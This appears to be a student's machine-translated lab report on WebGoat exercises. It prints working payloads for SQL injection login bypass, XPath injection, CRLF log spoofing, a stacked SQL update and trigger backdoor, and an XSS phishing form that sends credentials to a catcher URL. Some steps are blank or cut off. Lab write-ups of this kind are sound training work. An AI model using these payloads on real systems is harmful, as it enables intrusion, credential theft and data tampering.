EXP9 20155218 Web Security Fundamentals Practice

EXP9 Web Security Basic Practice 1, the experimental environment configuration:

• 1, in the command line execution: Java-jar Webgoat-container-7.1-exec.jar run Webgoat, folder clearly have, but did not succeed;
  
• 2, deleted the re-import once, unexpectedly successful, sometimes it is so strange;
  
• 3. Then open the Http://localhost:8080/WebGoat in the browser and enter the login screen to start the experiment:
  

• 4, found that the Mac can also be done, the choice of Mac, the specific steps and Linux match;

  2. Experimental items: (1), injection Flaws1), Command injection

• 1, use "check" to find the appropriate location, modify the code, any command line used in the commands can be entered here;
  

• 2. Successful attack:
  
  

2), Numeric SQL injection

• 1. Goal: Try to inject a SQL string that causes all weather data to be displayed.

• 2. Workaround: Use WebScarab to intercept the release request and replace 101 with 101 or 1 = 1!
  

• 3.:

3), Log Spoofing

• 1. Target:
  The gray area below represents what will be logged in the Web server's log file.
  * Your goal is to have it like username "admin" login successful.
  Elevate the attack by adding a script to the log file.

• 2. Workaround: In the User box, enter

  xzh%0d%0aLogin Succeeded for username: admin

• 3. Experimental results:

4), XPATH injection

• 1. Objective: The following table allows employees to see all of their personal data, including their wages. Your account is mike/test123. Your goal is to try to view other employee data.
• 2, Method: Look at the construction of the XPath query:

String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");File d = new File(dir);XPathFactory factory = XPathFactory.newInstance();XPath xPath = factory.newXPath();InputSource inputSource = new InputSource(new FileInputStream(d));String expression = "/employees/employee[loginID/text()=‘" + username + "‘ and passwd/text()=‘" + password + "‘]";nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);

• 3. XPath injection attacks are similar in nature to SQL injection attacks by entering code strings such as malicious queries to attack the site. XPath injection attacks, which take advantage of the loose input and fault tolerance features of the XPath parser, are capable of attaching a malicious XPath query code to a URL, form, or other information to gain access to the permission information and change that information. An XPath injection attack is a new attack method applied to a Web service that allows an attacker to obtain the full content of an XML document through an XPath query without prior knowledge of the XPath query.

• 4, Input: This is similar to SQL injection;
  Enter the user name and password at

  xzh ‘ or 1=1 or ‘‘= ‘

• 5, the computer interpretation of the obtained:

  expression = "/employees/employee[ ( loginID/text()=‘xzh‘ or ‘‘ =‘‘) and (  passwd/text()=‘xzh‘ or ‘‘=‘‘ ) ]"

• 6::

5), String SQL injection

• 1. Direct input

  ‘ or 1=1 --

• 2.

• 3, this is very simple, the first time nothing reference, a success;

6), Lab:sql injection one, Stage 1:string SQL Injection

• 1. Target: Use string SQL injection to bypass authentication. Use SQL injection to log in as the boss (' Neville ') without using the correct password. Verify that the Neville profile can be viewed and that all features are available (including search, create, and delete).
• 2, try: Want to modify the user name, but did not succeed; look at the background code, tidy up a bit of ideas, + + discovery should be able to successfully login, but in the jump page to be based on the UserID to jump, and my userid was I changed to userid--Nature is wrong ++
  
  
• 3, that can only modify the input box to enter the character length, and in the Password box input, ' or 1 = 1--
• 4. Successful landing:
  
  

Second, Stage 3:execute SQL injection to bypass authorization.

• 1. Goal: As a general employee ' Larry ', use SQL to inject the parameters of the view function (from the list staff page) to view the boss's profile (' Neville ').

• 2, use the same method as the previous step to log in, and then modify the value of values from the original Employee ID 101 revision to

  Because the boss has the highest salary, one of the final sorts is the boss.
  

• 3.:

• 4, if we change an employee ID (curly) login, just change the value to

  Naturally shows the information of the first employee (Larry);
  

7), Database backdoors

• 1. Target: Use string SQL injection to execute multiple SQL statements. The first phase uses a vulnerable field to create two SQL statements. The first one is the system, the second one is entirely yours. Your account ID is 101. This page allows you to view passwords, SSN, and payroll. Try to inject another update to update your salary
• 2, input 101; update employee set salary=5218 to modify the salary;
  

• 3, the same into a database backdoor,

  101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘ WHERE userid = NEW.userid

8) Phishing with XSS

• 1. Target: Phishing attack:

• 2. Method: Insert the XSS attack code into the search field:

  </form><script>function hack(){XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);}</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H2><br><br>EnterUsername:<br><input type="text"name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login"onclick="hack()"></form><br><br><HR>

• 3. Enter the information and click Search; successful attack
  
  # # # # 9), Stored XSS Attacks
• 1. Goal: Place the HTML tag in the form input field.
• 2, enter in the message board:
  

• 3, open, bounce out of the box; but XSS is not just a frame;
  

  10), Cross Site Request forgery (CSRF)
• Target: In the form of a picture to put the URL into the message box, when the URL is not visible to other users, the user once click on the image, will trigger a CSRF event.
• Input

• Success:

  3, Experiment Experience:

EXP9 20155218 Web Security Fundamentals Practice